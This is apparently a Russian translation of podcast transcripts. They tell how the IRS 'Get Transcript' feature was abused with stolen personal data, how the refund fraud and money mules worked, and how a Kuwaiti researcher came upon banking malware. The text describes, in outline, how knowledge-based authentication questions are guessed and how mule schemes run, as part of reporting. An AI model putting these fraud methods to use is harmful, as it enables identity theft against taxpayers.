Правительству США нужно много наших денег. В среднем они забирают около 14% нашей зарплаты. Если вы зарабатываете 67 000 долларов в год, они хотят из них 9 000 долларов. Но вот в чем дело; Американцы не копят 9000 долларов, чтобы отдавать их им каждый год. Мы просто просим наших работодателей вычесть эти деньги из нашей зарплаты еще до того, как мы их получим. Таким образом, все оплачено и прочее. Но мы не всегда знаем, сколько платить, и иногда мы недоплачиваем, и когда приходит время уплаты налогов, нам приходится платить немного больше. Но что на самом деле делают многие люди, так это переплачивают, а затем IRS возвращает нам деньги, которые нам не нужно было платить. Иногда это может быть налоговая декларация хорошего размера, тысячи долларов. Этот процесс подачи налоговых деклараций очень сложен, и традиционно IRS обрабатывает все это с помощью бумажных форм. Если вы хотели увидеть свои старые налоговые отчеты, вам нужно было заполнить форму IRS 4506 и заплатить 50 долларов, и вы можете получить свою старую налоговую отчетность, отправленную вам по почте.

Но в последнее десятилетие они перешли к электронной подаче документов, где вы можете сделать все это через веб-сайт irs.gov. В январе 2014 года они добавили на веб-сайт irs.gov новую функцию под названием «Получить стенограмму». Это позволит вам увидеть свои налоговые отчеты за прошлый год на случай, если вы захотите использовать их при подаче документов за этот год. Это была фантастическая функция, и сразу же миллионы американцев использовали ее для поиска своих налоговых форм за прошлый год. Обычно, когда вы подписываетесь на банковский счет или у поставщика медицинских услуг, вы проходите процесс регистрации, который часто включает в себя настройку пароля, а затем некоторые вопросы по восстановлению учетной записи, например, где вы познакомились со своим супругом или в какую среднюю школу вы ходили. Сайт irs.gov отличается. Они используют то, что называется мгновенным KBA или аутентификацией на основе знаний.

Они задают ряд вопросов, на которые только вы знаете ответ, например, какой у вас платеж по ипотеке и где вы купили машину. Это называется мгновенным KBA, потому что у них уже есть ответы на их стороне. Это немного отличается от банковского счета, где, когда они задают вам вопрос, они не знают ответа, и вы ставите ответ, а затем они сохраняют его для следующего раза. Благодаря Instant KBA они уже знают, в какую среднюю школу вы ходили, из вашей кредитной истории. IRS сотрудничает с одной из крупных компаний, предоставляющих кредитные отчеты, такой как EquiFax, чтобы узнать о вас больше. Благодаря этому IRS знает, на каких улицах вы раньше жили, какие кредитные карты у вас есть в настоящее время и тому подобное. Когда вы хотите использовать функцию «Получить выписку» на веб-сайте irs.gov, вам задают ряд подобных вопросов, ответы на которые знаете только вы, и они доказывают, кто вы, а затем вам показывают ваши старые налоговые отчеты.

Но можете ли вы догадаться, какие есть проблемы с этим мгновенным KBA? Ну, во-первых, IRS говорит, что 22% людей не могут сами правильно ответить на вопросы. Вы помните свой номер телефона, который у вас был десять лет назад, или адрес, который у вас был в колледже? Может быть, но когда тебе будет семьдесят? Вот еще одна проблема с мгновенным KBA; вы не можете отказаться от этого. IRS и EquiFax собрали и сохранили эту информацию о вас, на сохранение которой вы не давали им разрешения. Это может стать проблемой конфиденциальности. На самом деле NIST, правительственный совет по стандартам, специально комментирует это, говоря: «Неуместно непреднамеренно раскрывать конфиденциальность неизвестных граждан схемы мгновенной аутентификации KBA, если риск не близок к нулю». Еще одна большая проблема с этой аутентификацией, основанной на знаниях, связана с знанием секретной информации о вас.

По мере того, как наши данные становятся все более открытыми для всего мира из-за утечек, эта секретная информация больше не является секретной. Давайте вернемся в 2014 год, когда эта услуга «Получить стенограмму» впервые была представлена на веб-сайте irs.gov. Допустим, мы хотели получить наши старые стенограммы. Прежде всего, сайт запрашивает следующее: имя, номер социального страхования, адрес. Исторически сложилось так, что ваш номер социального страхования является приватным, и лишь немногие люди могут его знать, но по мере того, как происходят утечки данных, он становится не таким уж приватным. Имя и адрес не так уж сложно выяснить, поэтому эти первые вопросы можно легко победить, если кто-то знает это о вас. На этом этапе они заставляют вас зарегистрироваться с адресом электронной почты и отправляют вам электронное письмо для дальнейших шагов. Затем вам будут представлены четыре мгновенных вопроса KBA с несколькими вариантами ответов. Вот несколько образцов.

"Пожалуйста, выберите округ указанного вами адреса". Ну, очевидно, вы можете посмотреть это на любой карте, так что это легко. Следующий вопрос. "Согласно нашим записям, вы раньше жили в… вставьте город. Выберите улицу, на которой вы проживали в этом городе". Что ж, это вопрос с несколькими вариантами ответов, поэтому вы можете просмотреть ответы и исключить любые улицы, которых нет в этом городе, и тогда у вас будет довольно высокий шанс получить правильный ответ. "Пожалуйста, выберите город, в котором вы ранее проживали". Что ж, если у хакера были какие-либо данные о вас из предыдущих взломов, они, вероятно, включены. Или, черт возьми, ответ может быть даже в предыдущем вопросе. "Согласно нашим записям, какую из следующих средних школ вы окончили?" Ну, ты был на Facebook в последнее время? Почти все там есть, и все они любят писать, в какую среднюю школу они ходили, поэтому обычно это довольно легко найти. Вот и все.

Если вы правильно ответите на эти вопросы, вы получите абсолютно всю историю налоговых записей для этого человека. Если вы действительно посмотрите на это, потому что это вопросы с несколькими вариантами ответов, у нас есть шанс ответить на все вопросы правильно, даже не взломав данные, просто погуглив человека, где он жил и все такое. Эта опция «Получить расшифровку» на веб-сайте irs.gov использовалась миллионами людей в 2014 году, а затем снова в 2015 году. Это была отличная функция, но вы, возможно, уже заметили, что метод аутентификации, возможно, не был таким уж безопасным. Давайте перенесемся в февраль 2015 года, в тот же месяц, когда была обнаружена брешь в Anthem. Парень по имени Майкл Каспер идет заполнять налоговую декларацию. Он заполняет все формы в электронном виде и нажимает «Отправить», но что-то не так. Веб-сайт IRS сообщает ему, что он уже представил свои налоги, но это невозможно. Он еще не представил его. Он звонит в службу поддержки, и знаете что? Я позволю ему рассказать историю.

МАЙКЛ: В понедельник утром я позвонил в IRS, и они подтвердили мою личность, задав вопросы, связанные с налоговой историей, и показали мне, что депозит был внесен в тот же день, когда я звонил на чей-то счет, но было слишком поздно, чтобы остановить это. в таком случае.

Ведущий: Налоговое управление только что сообщило ему, что кто-то подал налоговую декларацию от его имени, и этому человеку был отправлен чек. Он уже был депонирован. Налоговое управление не смогло сообщить ему ничего другого, например, сколько стоил чек, в каком банке он был депонирован или что-то в этом роде. IRS не может раскрыть это из соображений конфиденциальности.

МАЙКЛ: Меня это расстроило. Именно тогда я попробовал функцию «Получить стенограмму» на веб-сайте IRS, чтобы узнать, могу ли я получить стенограмму, и обнаружил, что кто-то еще уже зарегистрировал свой адрес электронной почты с моим номером социального страхования.

Ведущий: Похоже, кто-то уже прошел этапы получения выписки из налоговой документации Майкла и зарегистрировался от его имени. В этот момент Майкл не знал, что и думать. Он задавался вопросом, взломали ли его, или кто-то украл его бумажник или личность, или что случилось. Это его вина, что это происходит? Снова и снова Майкл запрашивал дополнительную информацию о том, кто заполнил его налоги, но IRS отказывалась предоставить какую-либо информацию. В законе четко указано, что IRS не может никому передавать налоговую информацию, и он не смог войти на веб-сайт IRS и воспользоваться функцией «Получить выписку», потому что кто-то другой уже зарегистрировался под его именем. Он чувствовал себя застрявшим, но придумал новый план. Он выяснил, что если вы заполните форму IRS 4506 и включите 50 долларов, они отправят вам бумажную копию вашей налоговой декларации.

МАЙКЛ: Я узнал, что могу получить ксерокопию за 50 долларов. Они говорили мне, что я не могу получить информацию, но если я заплачу 50 долларов, я смогу ее получить. Итак, 17 марта я получил ксерокопию декларации, и именно тогда я узнал, что тот, кто подавал, видел мою декларацию за 2013 год, потому что информация была почти идентичной.

Какие данные заполучили злоумышленники и чем это обернулось для Майкла читай в следующем выпуске ровно через неделю.

Эпизод 22: Как нажиться на чужой страховке

Ведущий: Это было странно. Теперь он начал собирать кусочки воедино. Кто-то определенно прошел процедуру получения выписки на веб-сайте irs.gov, получил копию своей старой налоговой декларации и подал новую за этот год. Он просмотрел налоговую декларацию, которую подал кто-то другой, и они получили возмещение в размере 8 936 долларов. Это были деньги, которые налоговая служба должна была Майклу, но они отправили их другому человеку. Майкл внимательно посмотрел на свою налоговую декларацию…

МАЙКЛ: И видел номер банковского счета.

Ведущий: Майкл — умный парень, даже инженер, и он не получал никакой помощи от IRS, и он злился, злился из-за того, что кто-то украл у него его деньги. Он решил попробовать разобраться в этом самостоятельно.

МАЙКЛ: Но я связался с банком в Пенсильвании. Подтвердили, что залог внесен. Я предполагаю, что метаданные в депозите на самом деле показали, что мое имя и мое социальное обеспечение переходят на чей-то текущий счет. Они сказали мне место, Уильямспорт, Пенсильвания, где были сняты все деньги. Там я связался с местной полицией.

Ведущий: Полиция сразу же перезвонила ему и хотела узнать больше. Они открыли дело и начали расследование. В тот же день Майкл получил письмо.

МАЙКЛ: Я получил по почте письмо от IRS, что шесть недель спустя они получили мои документы и что они вернутся ко мне через шесть месяцев.

Ведущий: Это немного разозлило Майкла. Почти сразу после получения своих налоговых отчетов он смог добиться большого прогресса, начав полицейское расследование, и здесь IRS говорит, что им потребуется шесть месяцев, чтобы расследовать это?

МАЙКЛ: На той неделе я также получил письмо от Anthem Healthcare с предложением бесплатного кредитного мониторинга. Я действительно не знаю, связано ли это с тем, как была получена моя информация.

Ведущий: Личная информация Майкла была украдена при взломе Anthem, и он помнил, что данные, украденные при взломе Anthem, включали его имя, номер социального страхования и прошлые адреса. Этого, вероятно, будет достаточно, чтобы получить стенограмму. Полиция отправилась в дом этого человека в Пенсильвании и обнаружила, что этот человек, который внес чек, был молодой студенткой колледжа.

МАЙКЛ: Она откликнулась на объявление Craigslist, предлагающее работу.

Ведущий: Ах да, старая афера с дропами. Хорошо, вот как это работает. Преступники, которым нужно перевести деньги, будут предлагать работу на Craigslist, говоря что-то вроде того, что международной финансовой компании нужна помощь в написании писем. Затем они проходят собеседование и принимаются на работу. Сначала им дается несколько основных задач, например, поправить английский в некоторых электронных письмах. Эти базовые задачи только для того, чтобы заслужить доверие, потом преступники расскажут какую-нибудь грустную историю о том, что им нужно сразу заплатить клиенту, а средства привязаны. Они спрашивают жертву: "Эй, если мы отправим вам деньги, вы не могли бы отправить чек клиенту?" Если они соглашаются, рождается дроп. Быть дропом незаконно, и эта молодая женщина понятия не имела, что это незаконно. Ей просто нужны были дополнительные деньги, чтобы поступить в колледж.

МАЙКЛ: Деньги поступали на ее счет, а затем она переводила большие суммы в Нигерию через Вестерн Юнион.

Ведущий: Она отправила 7000 долларов в Нигерию, а в качестве вознаграждения смогла оставить остальные 1900 долларов, которые она потратила в основном на аренду жилья, оставив на счету всего 5 долларов, когда ее поймала полиция. Она была арестована за то, что была дропом, а позже вышла под залог, заплатив 8500 долларов. Майкл был разочарован всем этим испытанием, поэтому в конце марта он связался с журналистом Брайаном Кребсом, чтобы поделиться своей историей. Его история сразу же появилась в Krebs on Security, блоге о взломах и безопасности. IRS заметила это сообщение в блоге и в конце концов вернула ему деньги, но это заняло несколько месяцев. Майкл был не первым, кто сообщил об этом виде мошенничества в 2015 году. У многих других людей была такая же проблема, у тысяч других. IRS начала расследование.

https://i.gyazo.com/8145bf3bad00b4d088eb98a33674a0c4.png

Эта функция веб-сайта «Получить выписку» была настолько популярна, что только в этом году было получено более двадцати миллионов запросов, поэтому во время налогового периода это более 100 000 запросов на получение выписки в день. Но этот всплеск был намного больше. Это было похоже на сотни тысяч других за один день. На самом деле было так много запросов, что системы начали создавать резервные копии, и IRS подумала, что они подверглись атаке типа «отказ в обслуживании». Они смогли поддерживать сайт в рабочем состоянии и поддерживать поток пользователей, и все прекратилось. Через неделю, 21 мая, центр безопасности IRS обнаружил нечто ужасное. Это были не законные пользователи, пытавшиеся получить передачу налоговых записей. Это были хакеры, мошенники, воры. Было предпринято более 200 000 подозрительных попыток получить выписки налогоплательщиков, и половина из них оказалась успешной.

Воры успешно использовали функцию «Получить выписку» на веб-сайте irs.gov, чтобы получить налоговые отчеты 100 000 человек. Имейте в виду, это не взлом. Никаких уловок, эксплойтов или уязвимостей злоумышленники не использовали. Они просто нашли способ пройти через систему аутентификации, вероятно, используя некоторую личную информацию, которую они получили в результате других взломов. Но даже если это не взлом, это, безусловно, утечка данных, очень личных данных, и очень страшно подумать о том, что такие преступники сделают с вашими прошлыми налоговыми записями. У этих людей есть много ресурсов и времени, чтобы двигаться быстро и украсть много денег, так что это может создать проблемы для этих людей на годы или даже на всю жизнь. Как только IRS обнаружила, что 100 000 налоговых записей были украдены с их веб-сайта, они немедленно отключили функцию «Получить выписку». Пять дней спустя они объявили общественности, что произошло нарушение и было украдено 100 000 налоговых документов. IRS предпринял ряд корректирующих действий после этого нарушения. Вот комиссар IRS.

Комиссар: Письма уже разосланы примерно 100 000 налогоплательщикам, чья налоговая информация была успешно получена неуполномоченными третьими лицами. Мы предлагаем кредитный мониторинг за наш счет для этой группы налогоплательщиков, мы также даем им возможность получить личный идентификационный номер защиты личности, или IP PIN, как известно. Это дополнительно защитит их счета IRS. Приложение Get Transcript также было закрыто, пока мы рассматриваем варианты, чтобы сделать его более безопасным, не делая его недоступным для законных налогоплательщиков.

Ведущий: IRS создала эту опцию, чтобы получить PIN-код IP или номер личной информации для защиты личности. Это шестизначный код, который IRS может выдать вам, который затем потребуется для заполнения вашей налоговой декларации. Это усложняет для преступников подачу налогов, если они не знают этот PIN-код. Новость о взломе IRS была главной темой почти во всех новостных агентствах США. Граждане были возмущены, у конгресса и сенаторов возникли вопросы. Полное слушание комитета сената было проведено, чтобы получить показания IRS. Это вступительное заявление комиссара IRS Джона Коскинена.

Комиссар: Несанкционированные попытки доступа к информации с помощью приложения «Получить выписку» были предприняты в отношении примерно 200 000 учетных записей налогоплательщиков с сомнительных доменов электронной почты, и эти попытки были сложными и изощренными по своему характеру. Эти попытки были предприняты с использованием личной информации налогоплательщика, уже полученной из источников за пределами IRS. В середине мая наша команда по кибербезопасности заметила необычную активность в приложении Get Transcript. В конечном итоге они обнаружили сомнительные попытки доступа к приложению Get Transcript. Из примерно 100 000 успешных попыток доступа к приложению только 13 000 возможно мошеннических деклараций были поданы за 2014 налоговый год, по которым IRS выплатила возмещение на общую сумму около 39 000 000 долларов.

Ведущий: На этом слушании мы также услышим от Майкла Каспера, того парня, который сам выследил того, кто украл его налоговую декларацию. На самом деле клипы, которые вы слышали от него ранее, взяты с этого слушания в Сенате. На самом деле было несколько слушаний, которые продолжались часами. Во время слушания мы узнаем немного о типах компьютерных проблем, с которыми сталкивается IRS.

Комиссар: Мы используем устаревшую систему с некоторыми приложениями, которым пятьдесят лет, как отмечалось в некоторых случаях. Отмечено, что мы даже не смогли предоставить исправления для всех обновлений. Для некоторых наших систем нет исправлений, потому что они больше не поддерживаются провайдером.

Похоже, что преступники лучше знают вашу личную информацию, чем вы. Это просто увлекательно. Если вы помните, IRS начала использовать этот IP-пин, чтобы добавить дополнительный уровень безопасности вашим налогам, но у этого было несколько собственных проблем. Прежде всего, ваш PIN-код выдается через веб-сайт. Сравните это с тем, когда ваш банк отправляет вам ваш PIN-код по почте. Если вы потеряли свой PIN-код IRS и хотели его восстановить, вам нужно было пройти через тот же веб-сайт irs.gov, чтобы ответить на те же слабые вопросы KBA, которые злоумышленники победили, чтобы получить ваши стенограммы. Угадай, что? Преступники это поняли и начали красть PIN-коды. В феврале 2016 года IRS опубликовала заявление, в котором говорилось, что было совершено более 464 000 несанкционированных попыток получить PIN-код. Хакеры успешно получили от налогоплательщиков 101 000 PIN-кодов.

Затем налоговая обнаружила кое-что еще. Они провели еще одну проверку людей, которые сделали Get Transcript на веб-сайте. Они обнаружили, что число было выше, чем они первоначально думали. Сначала в IRS сказали, что это 101 000 человек, а потом выяснилось, что их было 334 000. Теперь IRS говорит, что это вдвое больше; У 724 000 человек налоговые декларации были украдены преступниками с помощью этой функции веб-сайта Get Transcript. Было отправлено больше писем и выпущено больше бесплатного кредитного мониторинга. В IRS есть целый отдел под названием Отдел уголовных расследований IRS, а в самой IRS работает более 2000 специальных агентов, которые специально расследуют налоговые махинации. Эти специальные агенты будут работать с ФБР, секретной службой, национальной безопасностью и местной полицией, чтобы выследить и поймать этих преступников.

Но поскольку сокращение бюджета ударяет по IRS, это означает, что около 4% специальных агентов теряют работу каждый год. Чем меньше расследований, тем меньше арестов. Отдел уголовных расследований IRS открывает около 35000 дел в год и фактически ловит и осуждает около 3000 человек в год. Узнали ли они, кто это сделал, и привлекли ли они их к ответственности? Я не уверен. Однако вот что я нашел. Министерство юстиции выпускает пресс-релиз каждый раз, когда кто-то выносится приговор за мошенничество с возмещением украденной личности. В нем перечислены сотни и сотни дел, начиная с 2010 года. Я начал просматривать его, просматривая записи дел, даты и преступления, чтобы найти что-нибудь, совпадающее с этим. Вещи начали появляться. Вероятно, самым крупным из них, которого я видел, был нигериец, которого поймали и приговорили к пятнадцати годам тюрьмы за осуществление одной из самых крупных схем налогового мошенничества.

Вот что произошло: группа людей в штате Орегон сообщила, что кто-то подал за них возврат налога. Группа уголовного расследования IRS изучила это и обнаружила, что кто-то мошенническим образом подавал налоговые декларации для людей в Орегоне и забирал все их возмещения. Они проследили эту деятельность до нигерийца по имени Казим, который жил в Мэриленде. Они арестовали его и нашли в его доме 150 предоплаченных кредитных карт, 40 000 долларов денежными переводами и 14 000 долларов наличными. В ходе суда они узнали, что произошло. Казим приобрел личную идентификационную информацию у вьетнамского хакера, в частности, 259 000 записей у компании в Орегоне. Возможно, вьетнамский хакер украл базу данных кредитного агентства или медицинского учреждения в Орегоне.

Затем Казим использовал эту информацию, чтобы выполнить Get Transcript на веб-сайте irs.gov, а также получить PIN-коды с веб-сайта для подачи налоговых деклараций для этих людей. Он подал 10 000 налоговых деклараций, что привело бы к получению 91 000 000 долларов, если бы он получил все декларации, но многие из них не были приняты. Ему удалось вернуть только 11 000 000 долларов за счет мошеннических возвратов. Чтобы сбить полицию с толку, он переправил большую часть денег через Нигерию, а затем обратно к себе. На него работали еще пять человек, все они были арестованы и посажены в тюрьму. Возможно, этот парень, Казим, был одним из самых крупных игроков в этой бреши, но я не думаю, что он был единственным. Просматривая другие аресты на веб-сайте Министерства юстиции, я вижу еще несколько, на этот раз даже ближе к дому.

Есть парень из Техаса, которого поймали и арестовали за то, что он мошеннически использовал функцию «Получить выписку», собирал информацию о людях и подавал для них налоговые декларации. Он был приговорен к двум годам лишения свободы. Затем была пара из Джорджии, которая была арестована за использование функции «Получить выписку» и получила возврат налогов на сумму более 1 000 000 долларов. Их обоих тоже посадили в тюрьму на несколько лет. Затем был еще один парень в Техасе, который также был пойман на использовании функции «Получить выписку» и тоже подавал ложные налоговые декларации. На самом деле, когда я начал выяснять, кто подает подобные мошеннические налоговые декларации, основание этой истории начало выпадать. Возьмем, к примеру, случай Даниэлы. Она 27-летняя экзотическая танцовщица из Тампы, штат Флорида, но ее арестовали за налоговое мошенничество. Она украла более 1 000 000 долларов в качестве возмещения налогов у людей, которых она не знала.

Она продолжала избегать наказания в течение четырех лет. На самом деле, в некоторых кругах она известна как пионер в этом деле. Она устраивала что-то под названием дроп-вечеринки. Здесь вы собираетесь и обмениваетесь тактиками, украденными личными данными и обучаете других, как это делать. В конце концов ее поймали и посадили в тюрьму.

Вы можете думать, что это не ваша проблема, это проблема IRS, но если вы рассчитываете или ожидаете большую налоговую декларацию, а кто-то другой получает ее вместо вас, теперь это ваша проблема. Конечно, IRS может потратить шесть месяцев на расследование и вернуть вам деньги, но эта задержка может стать кошмаром. Мы должны защитить себя. IRS вернула функцию «Получить выписку» на веб-сайте, и теперь для ее получения требуется дополнительная информация, например, вам нужно знать номер своего ипотечного счета и номер телефона, чтобы получить выписку. Но вы можете видеть, что этот метод аутентификации начинает показывать свой возраст и может больше не быть безопасным, потому что информация, которую знаете только вы, теперь известна хакерам по всему миру. Кто знает, что было украдено при взломе EquiFax? Может быть, вся база данных. Это могло раскрыть всю нашу секретную информацию, что полностью аннулировало бы KBA. Система KBA используется не только в IRS.

Они разрабатывают чрезвычайно продвинутые фильтры и алгоритмы для обнаружения мошенничества и проделали потрясающую работу по его устранению. Но это одна из тех вещей, которые никогда не снизятся до нуля, потому что мошенники будут постоянно искать лазейки или слабые меры безопасности и использовать их при любой возможности. Я не могу представить себе кошмар попыток обезопасить IRS. Поскольку он собирает более трех триллионов долларов налоговых поступлений в год, это горячая цель. IRS видит бесконечное количество нападений, мошенничества, мошенничества и воров, особенно во время налогового сезона, когда преступники могут попытаться спрятаться за массой отправляемых налоговых деклараций. Одна из самых больших проблем с веб-сайтом IRS заключается в том, что он должен быть достаточно простым для использования пожилыми людьми, но в то же время действительно безопасным. Я не уверен, что вообще выполнимо заставить всех регистрироваться с помощью электронной почты или двухфакторной аутентификации.

Это настолько сложная проблема, что у меня на самом деле голова болит, пытаясь найти решение этой проблемы. Это новый ландшафт угроз, с которыми приходится сталкиваться правительствам, и эти атаки становятся все более масштабными и изощренными. В 2016 году мы увидели целый ряд взломов компаний, и украдены были просто их налоговые отчеты W-2. У бывших и нынешних сотрудников CGATE и Snapchat были украдены их W-2, что было достаточной информацией для этих уличных банд, чтобы подавать декларации и открывать кредитные карты на ваше имя.

Эпизод 23: Чем опасны арабские хакеры

Ведущий: Для этой истории мы направляемся на Ближний Восток.

МОХАММЕД: Итак, меня зовут Мохаммед Альдуб. По-арабски это пишется م.محمد الدوب.

Ведущий: Да, так где ты сейчас?

МОХАММЕД: В Кувейте, как всегда. Это то место, откуда я родом.

Ведущий: Сейчас Мохаммеду за тридцать, но с подросткового возраста он увлекался компьютерами.

МОХАММЕД: Ну, Кувейт, как правило, представляет собой очень связанное общество, поэтому очень легко попасться на крючок с самого начала. С моей, скажем, возрастной группой, с интернетом, который вошел в наши дома в конце девяностых, рано подсел на технологии, это было – я думаю, это было очень просто. Но потом я действительно поступил в Кувейтский университет, в инженерный колледж и на факультет компьютерной и программной инженерии, так что я получил диплом инженера в этом направлении. Но затем, после выпуска, я действительно занялся кибербезопасностью. Итак, я пришел в кибербезопасность примерно в 2010 году.

https://i.gyazo.com/bcaf899af23450ea4fd0886769091753.png

Ведущий: Он получил работу в правительстве Кувейта, занимаясь обеспечением безопасности систем, и довольно рано осознал важность Интернета и защиты всего, что в нем есть.

МОХАММЕД: В мои ранние годы, где-то в 2010 и 2011 годах, я на самом деле познакомился с покойным Дэном Камински, и его руководство было действительно удивительным в отношении того, как новый и подающий надежды человек, такой как я, мог бы сделать, чтобы должным образом заняться кибербезопасностью. Я думаю, что с появлением социальных сетей, которые штурмом захватили политическую и общественную сцену Кувейта, для меня было совершенно естественным использовать эту платформу для обсуждения кибербезопасности и повышения осведомленности.

Ведущий: У Мохаммеда много поклонников в Твиттере. Там его зовут Вулнет, и он не говорит мне, что это значит. Сегодня у него 73 000 подписчиков, но чтобы добиться этого, он поделился в Твиттере большим количеством знаний о безопасности.

МОХАММЕД: Я сделал много — я бы сказал, что твит-шторм — это когда я беру определенный образец вредоносного ПО, который только что был свежим, в настоящее время используется для атаки на какую-то организацию в регионе Персидского залива, затем я выходил в эфир в Твиттере, пытаясь проанализировать вредоносное ПО, как это работает, что делает с системами. Так что это было чем-то вроде того, что мы делаем для сообщества, для толпы. Людям это понравится. Люди будут заниматься этим.

Ведущий: После колледжа он смог устроиться на работу в правительство Кувейта. Ему было поручено делать такие вещи, как обеспечение безопасности систем, анализ вредоносных программ и другие работы по кибербезопасности. Он хорошо разбирался в безопасности, масштабировался, и его популярность в Твиттере росла. С этим перед ним начали открываться новые двери.

МОХАММЕД: Затем, в 2018 году, я фактически оставил эту государственную работу, а затем прошел свой первый официальный тренинг по кибербезопасности, который проходил за границей. Это было в Нидерландах, поэтому я провел курс по анализу вредоносного ПО для Android для голландской полиции. Так что это было довольно интересно, потому что это был официальный первый официальный тренинг, который я провел за пределами Кувейта перед аудиторией в Европе.

Ведущий: Ему очень понравилось. Обучать людей новым вещам весело, поэтому он огляделся в поисках дополнительных возможностей для обучения.

МОХАММЕД: На самом деле меня приняли в Black Hat в качестве препода, и для меня это было сбывшейся мечтой. Я никогда не думал — обычно, когда я работал в правительстве, я мечтал посетить Black Hat, понимаете?

Ведущий: Black Hat — это ежегодная конференция по безопасности в Лас-Вегасе, которая проходит за неделю до Defcon, и Black Hat больше ориентирована на профессионалов в области безопасности и людей, которые хотят научиться лучше защищать свои системы. Обучение там, как я слышал, довольно хорошее, поэтому Мохаммед гордился тем, что его выбрали в качестве тренера. В частности, он планировал провести курс по защите конечных точек API. Но был 2019 год, и он получил известие, что станет тренером в начале этого года, например, в феврале или марте. Но Black Hat появится только в августе, так что у него было пять месяцев на подготовку. Именно в эти пять месяцев происходит эта история, история, изменившая его жизнь. Что Мохаммед любит делать, так это изучать новейшие вредоносные программы, и особенно его интересовало вредоносное ПО, которое каким-то образом использовалось в Кувейте, где он жил.

МОХАММЕД: Итак, конечно, находясь в регионе Персидского залива, было много интересных участников угроз, особенно, например, из Ирана, из других стран, из Израиля, других организаций и стран мира. Таким образом, очевидно, что регион Персидского залива был сильно атакован, и обычно это было что-то регулярное, когда мы пытались охотиться за угрозами, пытались искать государственных субъектов, атакующих определенные объекты.

Ведущий: Как государственному служащему, ему иногда присылали вредоносное ПО для анализа, и это было круто. Но поскольку он уволился с работы, ему нужно было найти новое место, чтобы следить за последними вредоносными программами, распространяющимися в Кувейте.

МОХАММЕД: Один из лучших способов поиска таких вещей — использование VirusTotal.

Ведущий: VirusTotal; это увлекательный веб-сайт. Итак, бесплатная услуга, которую они предлагают, заключается в том, что если вы обнаружите какое-либо вредоносное ПО, вы можете загрузить его на их сайт, и он сообщит вам, что это за вредоносное ПО. Это очень полезно для групп безопасности, чтобы получить информацию о любом вредоносном ПО, которое они нашли в своей сети. Я имею в виду, подумай об этом; предположим, что ваш компьютер работает плохо. Вы открываете Диспетчер задач и видите там запущенную службу. Что ж, вы можете взять его, загрузить на VirusTotal, и он сообщит вам, считают ли какие-либо антивирусы это вредоносным, и любую дополнительную информацию об этом вредоносном ПО. Так что да, службы безопасности постоянно загружают вредоносное ПО на этот сайт. Но если у вас премиум-членство, вы получаете бонусную функцию; если кто-то загружает какое-то вредоносное ПО в VirusTotal, и это файл, который он никогда раньше не видел, вы можете получить предупреждение. Таким образом, исследователям безопасности может быть интересно узнать, что может содержать этот новый файл, и они могут загрузить его и проанализировать. Мохаммед любил эту функцию.

МОХАММЕД: Я бы использовал его для фактического поиска атак, нацеленных на Кувейт, образцов вредоносных программ, загружаемых из Кувейта, из других стран региона, потому что они, очевидно, представляют интерес для моей работы.

Ведущий: Как он уже говорил, иногда он брал вредоносное ПО с этого сайта, VirusTotal, и начинал прямую трансляцию, когда изучал его, чтобы посмотреть, что в нем. Поскольку он говорил по-арабски, это также помогло ему лучше понимать угрозы, нацеленные на регион Персидского залива. Таким образом он находил довольно интересные вещи и писал об этом в Твиттере, а вскоре после этого видел, как некоторые крупные компании, занимающиеся безопасностью, публикуют предупреждения об этом. Это то, что я бы назвал исследованием безопасности.

На этом история Мохаммеда только начинается. Продолжение выйдет уже через неделю, не пропусти!

Эпизод 24: Как Северная Корея ограбила банк Кувейта

МОХАММЕД: Да, в марте, в конце марта 2019 года, я выполняю обычную работу по поиску угроз. Я нашел образец, напоминающий банковское вредоносное ПО, который был загружен из Кувейта.

Ведущий: Хорошо, это уже интересно. Мохаммед увидел, что на VirusTotal было загружено какое-то невиданное ранее вредоносное ПО, скачал его, изучил и обнаружил, что оно нацелено на банк. Не было сказано, какой банк, но у Мохаммеда было довольно хорошее предчувствие, что это какое-то банковское вредоносное ПО. Итак, он смотрит на это совершенно неизвестное вредоносное ПО, нацеленное на банк, которое было загружено откуда-то из Кувейта. Увлекательно, правда? Что ж, если вы думаете, что это увлекательно, возможно, вы гик. Немногие люди на планете просматривают совершенно новые вредоносные программы, загруженные на VirusTotal, пытаясь понять, что там происходит, но Мохаммед делает именно это, потому что ему нравится открывать для себя эти новые вещи, потому что они задают самые разные вопросы. Для какого банка это было? Загрузил ли его жертва или человек, который создал это вредоносное ПО? Действительно ли он заразил что-то и украл деньги? Что оно делает? Вот почему людям нравится следить за ним в Твиттере, потому что иногда он находит довольно интересные вещи.

МОХАММЕД: Итак, я зашел — скачал и проанализировал его, и фактически обсудил в Твиттере, отправил хэши для этого вредоносного ПО, чтобы любой в регионе мог найти эти хэши в своей среде и посмотреть, есть ли у них та или иная атака. вредоносное ПО.

Ведущий: Итак, он создал тред в Твиттере, и в то время у него было около 40 000 подписчиков в Твиттере. Он написал, цитирую: «Для тех, кто интересуется банковской безопасностью, вот некоторые весьма вероятные индикаторы компрометации в результате локальной банковской SWIFT-атаки, о которой вы, возможно, слышали». В то время в новостях ходили другие истории о взломе банков и краже денег с помощью системы денежных переводов SWIFT. Мохаммед увидел это вредоносное ПО и догадался, что оно может быть каким-то образом связано с этими атаками, и решил, что важно твитнуть о том, что он обнаружил. Он продолжил и разместил имена файлов и хэши файлов в Твиттере, и вы можете думать о хэше файла как о отпечатке пальца файла. Вместо того, чтобы публиковать сами файлы в Твиттере, он выложил хэш. Это делается для того, чтобы другие люди могли просматривать хэши своих файлов, чтобы проверить, есть ли это вредоносное ПО в их системах. Публикация таких хэшей файлов предпочтительнее, потому что при этом не публикуются какие-либо конфиденциальные данные, содержащиеся в вредоносном ПО, на тот случай, если он содержит пароль, IP-адрес или что-то, связанное с жертвой.

МОХАММЕД: Итак, что интересно, я нашел некоторые строки в этих вредоносных программах, которые, я думаю, будут полезны людям для поиска в их среде, чем я и поделился.

https://i.gyazo.com/e7f8b844ad7a5cc1623a69df039e4367.png

Ведущий: Итак, один из методов анализа вредоносного ПО — запуск над ним команды «strings». Это будет искать вредоносное ПО для любых удобочитаемых слов, и он просто выдает список слов для вас. Это может дать вам некоторые подсказки относительно того, что происходит, например, любые внутренние заметки, оставленные в коде, или другую информацию, удобочитаемую человеком. Мохаммед просмотрел код в поисках удобочитаемых слов, и одно слово выделилось для него: GBKADMIN. Почему в этой вредоносной программе есть слово GBKADMIN? Это имя пользователя? Это название вредоносной программы? Является ли GBKADMIN чем-то важным? Он понятия не имел и просто решил написать об этом в Твиттере, сказав своим подписчикам, что вредоносная программа содержит GBKADMIN, и это может что-то значить.

МОХАММЕД: Итак, сам образец вредоносного ПО на самом деле не указывает на определенный банк с уверенностью.

